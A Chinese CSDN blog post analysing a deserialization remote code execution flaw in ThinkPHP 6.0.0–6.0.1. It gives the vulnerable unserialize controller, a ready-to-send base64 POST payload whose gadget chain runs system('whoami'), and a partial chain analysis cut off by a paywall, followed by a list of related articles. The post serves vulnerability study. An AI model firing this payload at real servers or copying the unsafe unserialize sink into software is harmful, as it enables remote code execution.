ThinkPHP6.0.1_反序列化漏洞分析

最新推荐文章于 2024-05-10 20:58:45 发布
最新推荐文章于 2024-05-10 20:58:45 发布
阅读量546 收藏
点赞数
分类专栏: 代码审计 ThinkPHP 文章标签: 安全漏洞 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121600763
版权
ThinkPHP6.0.1_反序列化漏洞分析ThinkPHP6.0.0-ThinkPHP6.0.1漏洞代码<?phpnamespace app\controller;use app\BaseController;class Index extends BaseController{ public function index(){ $data = $_POST['data']; unserialize(base64_decode($data));
摘要由CSDN通过智能技术生成

ThinkPHP6.0.1_反序列化漏洞分析

  • ThinkPHP6.0.0-ThinkPHP6.0.1
  • 漏洞代码
    <?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController{
     
    public function index(){
     
        $data = $_POST['data'];
        unserialize(base64_decode($data));
    }
}
  • POC
    /index.php
POST
data=TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjg6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6Mjoia3kiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAd2l0aEV2ZW50IjtiOjA7czoxOToiAHRoaW5rXE1vZGVsAGV4aXN0cyI7YjoxO3M6MTg6IgB0aGlua1xNb2RlbABmb3JjZSI7YjoxO3M6NzoiACoAbmFtZSI7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjg6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6Mjoia3kiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAd2l0aEV2ZW50IjtiOjA7czoxOToiAHRoaW5rXE1vZGVsAGV4aXN0cyI7YjoxO3M6MTg6IgB0aGlua1xNb2RlbABmb3JjZSI7YjoxO3M6NzoiACoAbmFtZSI7TjtzOjEwOiIAKgB2aXNpYmxlIjthOjE6e3M6Mjoia3kiO2k6MTt9czoyMToiAHRoaW5rXE1vZGVsAHdpdGhBdHRyIjthOjE6e3M6Mjoia3kiO3M6Njoic3lzdGVtIjt9fXM6MTA6IgAqAHZpc2libGUiO2E6MTp7czoyOiJreSI7aToxO31zOjIxOiIAdGhpbmtcTW9kZWwAd2l0aEF0dHIiO2E6MTp7czoyOiJreSI7czo2OiJzeXN0ZW0iO319

漏洞分析

  1. TP5的反序列化链入口都是Windows类的__destruct,但是在TP6中把这个类移除了,那么这里利用的是Model::__destruct方法
    image-20211128235917039
  2. 这里$this->laxySave变量可控,跟进save方法,
    image-20211128235927018
  3. 因为在TP6.0.1中TP5.2.X反序列化链的__toString后面的链是可以利用的,所以这里只需要找到__toString入口即可,网上的大师傅寻找的链是save()->updateData()->checkAllowFields()->db()。先看第一个if条件判断,需要不进入if语句块才能继续往下执行到updateData方法
    image-20211128235936836
  4. 跟进isEmpty方法,$this->data可控
最低0.47元/天 解锁文章
0x6b79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP文件包含漏洞分析
include_voidmain的博客
12-10 1880
可见内容为从application\lang路径和think\lang路径加上我们URL中lang参数的内容,但是需要我们的此时lang参数为..\..\info.php但是在file列表的内容为info.php.php因此我们不能加上php的后缀。我们首先跟进range()方法:在App.php中调用range为Lang::range() 因此,range()此时直接return了self::$range此参数在detect中被URL的lang参数控制。
ThinkPHP 6.0.1 漏洞分析(任意文件操作)
god_Zeo的安全博客
02-12 5107
漏洞描述 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 具体受影响版 ThinkPHP6.0.0-6.0.1。 环境准备 /tp60/app/middleware.php 文件开启session 去掉se...
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
最新发布
2401_84301389的博客
05-10 1024
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP6.0反序列化审计
姜小孩的博客
04-09 2263
TP框架6.0漏洞审计,ThinkPHP6.0反序列化漏洞
漏洞预警| ThinkPHP多版本存在远程代码执行漏洞
LJQClqjc的博客
12-12 1063
棱镜七彩安全漏洞预警
ThinkPHP6.0.1_任意文件写入漏洞分析
11-29 803
ThinkPHP6.0.1_任意文件写入漏洞分析 ThinkPHP6.0.0-ThinkPHP6.0.1 漏洞代码<?php namespace app\controller; use app\BaseController; class Index extends BaseController{ public function index(){ $a = $_GET['a']; $b = $_GET['b']; session($a,$b);
ThinkPHP文件包含,远程执行漏洞分析
Fiverya的博客
12-13 1299
文件包含,代码执行漏洞漏洞编号:QVD-2022-46174
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkPHP3.2.3反序列化链子分析.doc
07-08
ThinkPHP3.2.3反序列化链子分析》 这篇文章主要探讨了ThinkPHP3.2.3框架中的一个安全问题——反序列化漏洞。由于该版本已不再维护,本文旨在重现和理解这个特定版本中的反序列化链子,以便于安全研究和教育。 反...
yershop_v3.0.2.zip_thinkphp5_thinkphp5.0_yershop_yershop漏洞_网店系统
07-14
yershop是基于thinkphp5.0.9,具有建站便捷、扩展丰富、二次开发灵活,以及支持云服务的特点,适合企业及个人快速构建个性化网上商店。 yershop采用模块化的架构设计思想,对目录结构规范做了调整,可以支持多模块...
thinkPHP中_initialize方法实例分析
10-20
主要介绍了thinkPHP中_initialize方法,结合实例形式分析了子类调用父类_initialize方法的原理与相关操作技巧,需要的朋友可以参考下
[代码审计] ThinkPHP V6.0.12LTS 反序列化漏洞
Only_kele_ 的博客
06-07 4835
在PHP中,反序列话分为有类和无类两种,无类的反序列化利用比较简单直接。有类的时候一般需要挖掘利用链,其中起到关键作用的就是魔术方法,魔术方法是连接利用链的桥梁。在挖掘反序列化的时候,一般来说首先要找的就是 , 两个函数 1.2 寻找触发条件 用全局搜索存在的地方 然后找可利用的点,在中发现 调用了方法,只需要 为 即可,并且这个参数是可控的 跟进方法,关键点如下,需要进入到函数,要绕过位置1处的判断和为 是可控的,所以关键点是绕过前面的判断 查看函数,使用函数对进行判断,不为空即可,
ThinkPHP v6.0.x反序列化漏洞复现
m0_46616663的博客
06-02 813
这次ciscnweb就做出来一道题呜呜呜呜呜我太菜了唯一的一道在这里仔细复现分析一下贴一张当时的图 当时用dirsearch扫到了www.zip,down下来直接拖到wamp里 搭建成功 题目中的入口函数在\app\controller\Index.php中 在ThinkPHP6.0完全开发手册中可以看到进入路由的访问url 访问测试 漏洞起点在/vendor/topthink/think-orm/src/Model.php中的**__destruct()**函数魔术方法__destruct()
ThinkPHP V6.0.12LTS 反序列化漏洞的保姆级教程(含exp编写过程)
include_voidmain的博客
08-23 3898
ThinkPHP V6.0.12LTS 反序列化漏洞的保姆级教程(含exp编写过程)
mysql 反序列化_从一道CTF题目中学习ThinkPHP反序列化
weixin_39710361的博客
12-23 525
前言去年的安洵杯,里面有一道iamthinking的题目(好像是这个名字吧),里面考察到了tp6的反序列化(通过访问www.zip可以下载源码),按照惯例,我还是没有做出来,我不知道咋绕过那个正则emmmm,给没有做题的大师傅献上关键源码吧,如果有师傅懂,欢迎评论<?php namespace appcontroller; use appBaseController; class Inde...
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 7191
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6(1),网络安全内存泄漏总结
04-15 1972
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。docker ps**漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。
Thinkphp最新版本漏洞分析
kali_Ma的博客
02-27 4610
环境 Thinkphp6.0.12LTS(目前最新版本); PHP7.3.4。 安装 composer create-project topthink/think tp6 测试代码 漏洞分析 漏洞起点不是__desturct就是__wakeup全局搜索下,起点在vendor\topthink\think-orm\src\Model.php 只要把this->lazySave设为True,就会调用了save方法。 【一>所有资源获取<一】 1、网络安全学习路线 2、电子书籍(白帽子
ThinkPHP v6.0.7 eval反序列化利用链1
08-03
"ThinkPHP v6.0.7 eval反序列化漏洞利用链解析" 这篇文章主要讨论了ThinkPHP框架的一个安全问题,即在版本6.0.7中的一个eval反序列化利用链。作者指出,虽然在之前的ThinkPHP v6.0.x版本中存在反序列化链条,但无法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值